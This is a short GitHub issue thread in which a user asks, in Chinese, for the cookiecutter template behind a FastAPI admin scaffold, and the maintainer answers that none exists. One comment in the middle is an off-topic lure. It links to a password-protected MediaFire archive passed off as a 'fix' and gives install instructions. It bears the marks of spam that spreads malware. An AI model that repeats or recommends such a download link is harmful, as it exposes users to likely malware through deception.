### ISSUE TITLE
这个fastapi脚手架不错，能告知一下cookiecutter地址吗

### ISSUE THREAD

**Issue by nrtzhou** [mizhexiaoxiao/vue-fastapi-admin#43]
谢谢啦

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mizhexiaoxiao** [comment]
没有这个
